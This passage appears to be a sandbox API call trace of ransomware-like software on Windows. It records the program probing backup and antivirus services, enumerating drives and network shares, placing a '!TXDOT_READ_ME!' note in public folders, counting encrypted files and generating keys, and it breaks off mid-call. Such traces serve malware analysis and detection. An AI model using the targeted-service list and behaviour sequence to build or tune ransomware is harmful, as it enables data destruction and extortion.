1 [0101.301] GetTickCount () returned 0x115bc96 [0101.301] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.301] OpenServiceW (hSCManager=0x6835478, lpServiceName="VeeamNFSSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.302] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.302] GetTickCount () returned 0x115bc96 [0101.302] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.302] OpenServiceW (hSCManager=0x6835400, lpServiceName="VeeamRESTSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.302] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.302] GetTickCount () returned 0x115bc96 [0101.302] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.303] OpenServiceW (hSCManager=0x68353d8, lpServiceName="VeeamTransportSvc", dwDesiredAccess=0x2c) returned 0x0 [0101.303] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.303] GetTickCount () returned 0x115bc96 [0101.303] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.303] OpenServiceW (hSCManager=0x6835400, lpServiceName="W3Svc", dwDesiredAccess=0x2c) returned 0x0 [0101.304] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.304] GetTickCount () returned 0x115bc96 [0101.304] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.304] OpenServiceW (hSCManager=0x6835478, lpServiceName="WRSVC", dwDesiredAccess=0x2c) returned 0x0 [0101.304] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.305] GetTickCount () returned 0x115bc96 [0101.305] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.305] OpenServiceW (hSCManager=0x6835400, lpServiceName="Zoolz 2 Service", dwDesiredAccess=0x2c) returned 0x0 [0101.305] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.305] GetTickCount () returned 0x115bc96 [0101.305] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352e8 [0101.306] OpenServiceW (hSCManager=0x68352e8, lpServiceName="bedbg", dwDesiredAccess=0x2c) returned 0x0 [0101.306] CloseServiceHandle (hSCObject=0x68352e8) returned 1 [0101.306] GetTickCount () returned 0x115bc96 [0101.306] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353b0 [0101.306] OpenServiceW (hSCManager=0x68353b0, lpServiceName="ekrn", dwDesiredAccess=0x2c) returned 0x0 [0101.307] CloseServiceHandle (hSCObject=0x68353b0) returned 1 [0101.307] GetTickCount () returned 0x115bc96 [0101.307] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68353d8 [0101.307] OpenServiceW (hSCManager=0x68353d8, lpServiceName="kavfsslp", dwDesiredAccess=0x2c) returned 0x0 [0101.307] CloseServiceHandle (hSCObject=0x68353d8) returned 1 [0101.308] GetTickCount () returned 0x115bc96 [0101.308] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835338 [0101.308] OpenServiceW (hSCManager=0x6835338, lpServiceName="klnagent", dwDesiredAccess=0x2c) returned 0x0 [0101.312] CloseServiceHandle (hSCObject=0x6835338) returned 1 [0101.312] GetTickCount () returned 0x115bca5 [0101.312] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.312] OpenServiceW (hSCManager=0x6835360, lpServiceName="macmnsvc", dwDesiredAccess=0x2c) returned 0x0 [0101.312] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.313] GetTickCount () returned 0x115bca5 [0101.313] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.313] OpenServiceW (hSCManager=0x68352c0, lpServiceName="masvc", dwDesiredAccess=0x2c) returned 0x0 [0101.313] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.313] GetTickCount () returned 0x115bca5 [0101.313] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.314] OpenServiceW (hSCManager=0x6835388, lpServiceName="mfefire", dwDesiredAccess=0x2c) returned 0x0 [0101.314] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.314] GetTickCount () returned 0x115bca5 [0101.314] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.314] OpenServiceW (hSCManager=0x6835478, lpServiceName="mfemms", dwDesiredAccess=0x2c) returned 0x0 [0101.315] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.315] GetTickCount () returned 0x115bca5 [0101.315] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68354a0 [0101.315] OpenServiceW (hSCManager=0x68354a0, lpServiceName="mfevtp", dwDesiredAccess=0x2c) returned 0x0 [0101.315] CloseServiceHandle (hSCObject=0x68354a0) returned 1 [0101.316] GetTickCount () returned 0x115bca5 [0101.316] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.316] OpenServiceW (hSCManager=0x6835270, lpServiceName="mozyprobackup", dwDesiredAccess=0x2c) returned 0x0 [0101.316] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.316] GetTickCount () returned 0x115bca5 [0101.316] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68352c0 [0101.317] OpenServiceW (hSCManager=0x68352c0, lpServiceName="msftesql$PROD", dwDesiredAccess=0x2c) returned 0x0 [0101.317] CloseServiceHandle (hSCObject=0x68352c0) returned 1 [0101.317] GetTickCount () returned 0x115bca5 [0101.317] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835478 [0101.317] OpenServiceW (hSCManager=0x6835478, lpServiceName="ntrtscan", dwDesiredAccess=0x2c) returned 0x0 [0101.318] CloseServiceHandle (hSCObject=0x6835478) returned 1 [0101.318] GetTickCount () returned 0x115bca5 [0101.318] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.318] OpenServiceW (hSCManager=0x6835220, lpServiceName="sacsvr", dwDesiredAccess=0x2c) returned 0x0 [0101.318] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.318] GetTickCount () returned 0x115bca5 [0101.318] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835220 [0101.319] OpenServiceW (hSCManager=0x6835220, lpServiceName="sophossps", dwDesiredAccess=0x2c) returned 0x0 [0101.319] CloseServiceHandle (hSCObject=0x6835220) returned 1 [0101.319] GetTickCount () returned 0x115bca5 [0101.319] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835388 [0101.320] OpenServiceW (hSCManager=0x6835388, lpServiceName="svcGenericHost", dwDesiredAccess=0x2c) returned 0x0 [0101.320] CloseServiceHandle (hSCObject=0x6835388) returned 1 [0101.320] GetTickCount () returned 0x115bca5 [0101.320] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x68354a0 [0101.320] OpenServiceW (hSCManager=0x68354a0, lpServiceName="swi_filter", dwDesiredAccess=0x2c) returned 0x0 [0101.320] CloseServiceHandle (hSCObject=0x68354a0) returned 1 [0101.321] GetTickCount () returned 0x115bca5 [0101.321] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835360 [0101.321] OpenServiceW (hSCManager=0x6835360, lpServiceName="swi_service", dwDesiredAccess=0x2c) returned 0x0 [0101.321] CloseServiceHandle (hSCObject=0x6835360) returned 1 [0101.321] GetTickCount () returned 0x115bca5 [0101.321] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835400 [0101.322] OpenServiceW (hSCManager=0x6835400, lpServiceName="swi_update", dwDesiredAccess=0x2c) returned 0x0 [0101.322] CloseServiceHandle (hSCObject=0x6835400) returned 1 [0101.322] GetTickCount () returned 0x115bca5 [0101.322] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835248 [0101.322] OpenServiceW (hSCManager=0x6835248, lpServiceName="swi_update_64", dwDesiredAccess=0x2c) returned 0x0 [0101.323] CloseServiceHandle (hSCObject=0x6835248) returned 1 [0101.323] GetTickCount () returned 0x115bca5 [0101.323] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.323] OpenServiceW (hSCManager=0x6835270, lpServiceName="tmlisten", dwDesiredAccess=0x2c) returned 0x0 [0101.323] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.345] GetTickCount () returned 0x115bcc4 [0101.348] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x6835270 [0101.350] OpenServiceW (hSCManager=0x6835270, lpServiceName="wbengine", dwDesiredAccess=0x2c) returned 0x6835298 [0101.350] QueryServiceStatusEx (in: hService=0x6835298, InfoLevel=0x0, lpBuffer=0x95fa94, cbBufSize=0x24, pcbBytesNeeded=0x95fac0 | out: lpBuffer=0x95fa94, pcbBytesNeeded=0x95fac0) returned 1 [0101.351] CloseServiceHandle (hSCObject=0x6835298) returned 1 [0101.351] CloseServiceHandle (hSCObject=0x6835270) returned 1 [0101.351] GetSystemWindowsDirectoryW (in: lpBuffer=0x854868, uSize=0x104 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0101.351] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x8325b0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x95fe04 | out: lpThreadId=0x95fe04*=0x1360) returned 0xa84 [0101.351] CloseHandle (hObject=0xa84) returned 1 [0101.352] Sleep (dwMilliseconds=0x3a98) [0113.564] GetLogicalDriveStringsW (in: nBufferLength=0x104, lpBuffer=0x8589f0 | out: lpBuffer="C:\\") returned 0x4 [0113.564] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831bb0, lpParameter=0x8589f0, dwCreationFlags=0x0, lpThreadId=0x95fe04 | out: lpThreadId=0x95fe04*=0xbec) returned 0x614 [0113.589] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x95f9cc | out: lphEnum=0x95f9cc*=0xec1db0) returned 0x0 [0113.593] GetProcessHeap () returned 0xe30000 [0113.597] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x1080) returned 0xecefb0 [0113.614] WNetEnumResourceW (in: hEnum=0xec1db0, lpcCount=0x95f9d0, lpBuffer=0xecefb0, lpBufferSize=0x95f9c8 | out: lpcCount=0x95f9d0, lpBuffer=0xecefb0, lpBufferSize=0x95f9c8) returned 0x0 [0113.614] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xecefb0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0x6817388) returned 0x0 [0113.671] GetProcessHeap () returned 0xe30000 [0113.671] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x1080) returned 0x6805800 [0113.675] WNetEnumResourceW (in: hEnum=0x6817388, lpcCount=0x95f9a8, lpBuffer=0x6805800, lpBufferSize=0x95f9a0 | out: lpcCount=0x95f9a8, lpBuffer=0x6805800, lpBufferSize=0x95f9a0) returned 0x103 [0113.675] GetProcessHeap () returned 0xe30000 [0113.687] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6805800 | out: hHeap=0xe30000) returned 1 [0113.687] WNetCloseEnum (hEnum=0x6817388) returned 0x0 [0113.687] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xecefd0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0x6817388) returned 0x4b8 [0128.154] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xeceff0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0x6817388) returned 0x4c6 [0128.155] WNetEnumResourceW (in: hEnum=0xec1db0, lpcCount=0x95f9d0, lpBuffer=0xecefb0, lpBufferSize=0x95f9c8 | out: lpcCount=0x95f9d0, lpBuffer=0xecefb0, lpBufferSize=0x95f9c8) returned 0x103 [0128.155] GetProcessHeap () returned 0xe30000 [0128.155] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecefb0 | out: hHeap=0xe30000) returned 1 [0128.155] WNetCloseEnum (hEnum=0xec1db0) returned 0x0 [0128.155] WaitForMultipleObjects (nCount=0x1, lpHandles=0x95f9ec*=0x614, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0128.156] GetLogicalDriveStringsW (in: nBufferLength=0x104, lpBuffer=0x8589f0 | out: lpBuffer="C:\\") returned 0x4 [0128.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831bb0, lpParameter=0x8589f0, dwCreationFlags=0x0, lpThreadId=0x95fe04 | out: lpThreadId=0x95fe04*=0xd70) returned 0x638 [0128.156] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x95f9cc | out: lphEnum=0x95f9cc*=0xec18b0) returned 0x0 [0128.156] GetProcessHeap () returned 0xe30000 [0128.156] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x1080) returned 0xecefb0 [0128.156] WNetEnumResourceW (in: hEnum=0xec18b0, lpcCount=0x95f9d0, lpBuffer=0xecefb0, lpBufferSize=0x95f9c8 | out: lpcCount=0x95f9d0, lpBuffer=0xecefb0, lpBufferSize=0x95f9c8) returned 0x0 [0128.156] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xecefb0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0x68173c8) returned 0x0 [0128.157] GetProcessHeap () returned 0xe30000 [0128.157] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x1080) returned 0xee9010 [0128.157] WNetEnumResourceW (in: hEnum=0x68173c8, lpcCount=0x95f9a8, lpBuffer=0xee9010, lpBufferSize=0x95f9a0 | out: lpcCount=0x95f9a8, lpBuffer=0xee9010, lpBufferSize=0x95f9a0) returned 0x103 [0128.157] GetProcessHeap () returned 0xe30000 [0128.157] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xee9010 | out: hHeap=0xe30000) returned 1 [0128.157] WNetCloseEnum (hEnum=0x68173c8) returned 0x0 [0128.157] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xecefd0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0x68173c8) returned 0x4b8 [0144.277] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0xeceff0, lphEnum=0x95f9a4 | out: lphEnum=0x95f9a4*=0x68173c8) returned 0x4c6 [0144.278] WNetEnumResourceW (in: hEnum=0xec18b0, lpcCount=0x95f9d0, lpBuffer=0xecefb0, lpBufferSize=0x95f9c8 | out: lpcCount=0x95f9d0, lpBuffer=0xecefb0, lpBufferSize=0x95f9c8) returned 0x103 [0144.278] GetProcessHeap () returned 0xe30000 [0144.278] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecefb0 | out: hHeap=0xe30000) returned 1 [0144.278] WNetCloseEnum (hEnum=0xec18b0) returned 0x0 [0144.278] WaitForMultipleObjects (nCount=0x1, lpHandles=0x95f9ec*=0x638, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0144.278] Sleep (dwMilliseconds=0x3e8) [0145.375] SHGetFolderPathW (in: hwnd=0x0, csidl=24, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0145.376] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0145.376] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0145.376] SHGetFolderPathW (in: hwnd=0x0, csidl=25, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\Users\\Public\\Desktop") returned 0x0 [0145.376] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0145.376] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0145.376] SHGetFolderPathW (in: hwnd=0x0, csidl=53, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\Users\\Public\\Music") returned 0x0 [0145.376] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0145.376] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0145.376] SHGetFolderPathW (in: hwnd=0x0, csidl=54, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\Users\\Public\\Pictures") returned 0x0 [0145.376] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0145.376] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0145.376] SHGetFolderPathW (in: hwnd=0x0, csidl=55, hToken=0x0, dwFlags=0x0, pszPath=0x95fbf4 | out: pszPath="C:\\Users\\Public\\Videos") returned 0x0 [0145.376] StrCpyNW (in: psz1=0x95fbf4, psz2="!TXDOT_READ_ME!.txt", cchMax=260 | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0145.376] PathFileExistsW (pszPath="!TXDOT_READ_ME!.txt") returned 1 [0145.376] GetSystemWindowsDirectoryA (in: lpBuffer=0x95fd04, uSize=0x104 | out: lpBuffer="C:\\WINDOWS") returned 0xa [0145.377] PathAppendA (in: pszPath="C:\\WINDOWS", pMore="CryptoGuard" | out: pszPath="C:\\WINDOWS\\CryptoGuard") returned 1 [0145.377] PathIsDirectoryA (pszPath="C:\\WINDOWS\\CryptoGuard") returned 0 [0145.377] GetTickCount () returned 0x1167c4c [0145.377] GetLastError () returned 0x2 [0145.377] lstrlenA (lpString="Complete (+%u (%u) files done) [%s]\nWork time: %d:%02d:%02d\n") returned 60 [0145.377] GetProcessHeap () returned 0xe30000 [0145.377] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2bd) returned 0xf1e570 [0145.377] wvnsprintfA (in: pszDest=0xf1e570, cchDest=572, pszFmt="Complete (+%u (%u) files done) [%s]\nWork time: %d:%02d:%02d\n", arglist=0x95fe28 | out: pszDest="Complete (+0 (404) files done) [NQDPDE]\nWork time: 0:01:36\n") returned 59 [0145.377] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0145.377] WriteFile (in: hFile=0x90, lpBuffer=0xf1e570*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x95fe10, lpOverlapped=0x0 | out: lpBuffer=0xf1e570*, lpNumberOfBytesWritten=0x95fe10*=0x3b, lpOverlapped=0x0) returned 1 [0145.494] FlushFileBuffers (hFile=0x90) returned 0 [0145.554] GetProcessHeap () returned 0xe30000 [0145.554] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xf1e570 | out: hHeap=0xe30000) returned 1 [0145.554] SetLastError (dwErrCode=0x2) [0145.554] ExitProcess (uExitCode=0x0) Thread: id = 7 os_tid = 0xd58 Thread: id = 8 os_tid = 0x798 [0058.963] Sleep (dwMilliseconds=0x493e0) [0068.986] Sleep (dwMilliseconds=0x493e0) [0079.156] GetLastError () returned 0x0 [0079.156] lstrlenA (lpString="+%u (%u) files done [%s] [%u KB/s]\n") returned 35 [0079.156] GetProcessHeap () returned 0xe30000 [0079.156] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2a4) returned 0xecab68 [0079.156] wvnsprintfA (in: pszDest=0xecab68, cchDest=547, pszFmt="+%u (%u) files done [%s] [%u KB/s]\n", arglist=0x2befee8 | out: pszDest="+237 (0) files done [NQDPDE] [0 KB/s]\n") returned 38 [0079.156] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0079.156] WriteFile (in: hFile=0x90, lpBuffer=0xecab68*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2befed0, lpOverlapped=0x0 | out: lpBuffer=0xecab68*, lpNumberOfBytesWritten=0x2befed0*=0x26, lpOverlapped=0x0) returned 1 [0079.249] FlushFileBuffers (hFile=0x90) returned 0 [0079.343] GetProcessHeap () returned 0xe30000 [0079.343] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0079.343] SetLastError (dwErrCode=0x0) [0079.343] Sleep (dwMilliseconds=0x493e0) [0089.466] GetLastError () returned 0x0 [0089.466] lstrlenA (lpString="+%u (%u) files done [%s] [%u KB/s]\n") returned 35 [0089.466] GetProcessHeap () returned 0xe30000 [0089.466] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2a4) returned 0xe55bd0 [0089.466] wvnsprintfA (in: pszDest=0xe55bd0, cchDest=547, pszFmt="+%u (%u) files done [%s] [%u KB/s]\n", arglist=0x2befee8 | out: pszDest="+380 (0) files done [NQDPDE] [0 KB/s]\n") returned 38 [0089.466] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0089.466] WriteFile (in: hFile=0x90, lpBuffer=0xe55bd0*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2befed0, lpOverlapped=0x0 | out: lpBuffer=0xe55bd0*, lpNumberOfBytesWritten=0x2befed0*=0x26, lpOverlapped=0x0) returned 1 [0089.781] FlushFileBuffers (hFile=0x90) returned 0 [0090.008] GetProcessHeap () returned 0xe30000 [0090.008] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe55bd0 | out: hHeap=0xe30000) returned 1 [0090.008] SetLastError (dwErrCode=0x0) [0090.008] Sleep (dwMilliseconds=0x493e0) [0100.058] GetLastError () returned 0x0 [0100.058] lstrlenA (lpString="+%u (%u) files done [%s] [%u KB/s]\n") returned 35 [0100.058] GetProcessHeap () returned 0xe30000 [0100.058] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2a4) returned 0x6807ca0 [0100.058] wvnsprintfA (in: pszDest=0x6807ca0, cchDest=547, pszFmt="+%u (%u) files done [%s] [%u KB/s]\n", arglist=0x2befee8 | out: pszDest="+404 (237) files done [NQDPDE] [0 KB/s]\n") returned 40 [0100.058] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0100.058] WriteFile (in: hFile=0x90, lpBuffer=0x6807ca0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2befed0, lpOverlapped=0x0 | out: lpBuffer=0x6807ca0*, lpNumberOfBytesWritten=0x2befed0*=0x28, lpOverlapped=0x0) returned 1 [0100.155] FlushFileBuffers (hFile=0x90) returned 0 [0100.226] GetProcessHeap () returned 0xe30000 [0100.226] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6807ca0 | out: hHeap=0xe30000) returned 1 [0100.229] SetLastError (dwErrCode=0x0) [0100.229] Sleep (dwMilliseconds=0x493e0) [0110.720] Sleep (dwMilliseconds=0x493e0) [0120.738] Sleep (dwMilliseconds=0x493e0) [0130.811] Sleep (dwMilliseconds=0x493e0) [0140.853] Sleep (dwMilliseconds=0x493e0) Thread: id = 9 os_tid = 0xd88 [0059.702] Sleep (dwMilliseconds=0xea60) [0069.724] GetTickCount () returned 0x115f103 [0069.724] GetProcessHeap () returned 0xe30000 [0069.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xe9e868 [0069.724] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xe9e868, lpcbData=0x2dee40c*=0x2000 | out: lpType=0x0, lpData=0xe9e868*=0x50, lpcbData=0x2dee40c*=0x3d8) returned 0x0 [0069.730] GetProcessHeap () returned 0xe30000 [0069.730] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e868 | out: hHeap=0xe30000) returned 1 [0069.730] GetTickCount () returned 0x115f103 [0069.730] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0069.730] GetCurrentProcess () returned 0xffffffff [0069.730] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0069.730] CryptAcquireContextA (in: phProv=0x2dee408, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee408*=0xe366e0) returned 1 [0069.734] CryptCreateHash (in: hProv=0xe366e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2dee40c | out: phHash=0x2dee40c) returned 1 [0069.734] CryptHashData (hHash=0xe9f5e0, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0069.734] CryptGetHashParam (in: hHash=0xe9f5e0, dwParam=0x4, pbData=0x2dee404, pdwDataLen=0x2dee400, dwFlags=0x0 | out: pbData=0x2dee404, pdwDataLen=0x2dee400) returned 1 [0069.734] CryptGetHashParam (in: hHash=0xe9f5e0, dwParam=0x2, pbData=0x2dee428, pdwDataLen=0x2dee404, dwFlags=0x0 | out: pbData=0x2dee428, pdwDataLen=0x2dee404) returned 1 [0069.734] CryptDestroyHash (hHash=0xe9f5e0) returned 1 [0069.734] CryptReleaseContext (hProv=0xe366e0, dwFlags=0x0) returned 1 [0069.734] GetProcessHeap () returned 0xe30000 [0069.734] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xe505f0 [0069.734] wnsprintfA (in: pszDest=0xe505f0, cchDest=4, pszFmt="%02x" | out: pszDest="ae") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe505f2, cchDest=4, pszFmt="%02x" | out: pszDest="99") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe505f4, cchDest=4, pszFmt="%02x" | out: pszDest="4d") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe505f6, cchDest=4, pszFmt="%02x" | out: pszDest="88") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe505f8, cchDest=4, pszFmt="%02x" | out: pszDest="3f") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe505fa, cchDest=4, pszFmt="%02x" | out: pszDest="29") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe505fc, cchDest=4, pszFmt="%02x" | out: pszDest="c5") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe505fe, cchDest=4, pszFmt="%02x" | out: pszDest="aa") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe50600, cchDest=4, pszFmt="%02x" | out: pszDest="35") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe50602, cchDest=4, pszFmt="%02x" | out: pszDest="a0") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe50604, cchDest=4, pszFmt="%02x" | out: pszDest="f1") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe50606, cchDest=4, pszFmt="%02x" | out: pszDest="2a") returned 2 [0069.734] wnsprintfA (in: pszDest=0xe50608, cchDest=4, pszFmt="%02x" | out: pszDest="b7") returned 2 [0069.735] wnsprintfA (in: pszDest=0xe5060a, cchDest=4, pszFmt="%02x" | out: pszDest="0e") returned 2 [0069.735] wnsprintfA (in: pszDest=0xe5060c, cchDest=4, pszFmt="%02x" | out: pszDest="7f") returned 2 [0069.735] wnsprintfA (in: pszDest=0xe5060e, cchDest=4, pszFmt="%02x" | out: pszDest="29") returned 2 [0069.735] CryptAcquireContextW (in: phProv=0x2dee18c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee18c*=0xe366e0) returned 1 [0069.736] CryptGenRandom (in: hProv=0xe366e0, dwLen=0x80, pbBuffer=0x2dee1a0 | out: pbBuffer=0x2dee1a0) returned 1 [0069.736] CryptReleaseContext (hProv=0xe366e0, dwFlags=0x0) returned 1 [0069.736] GetProcessHeap () 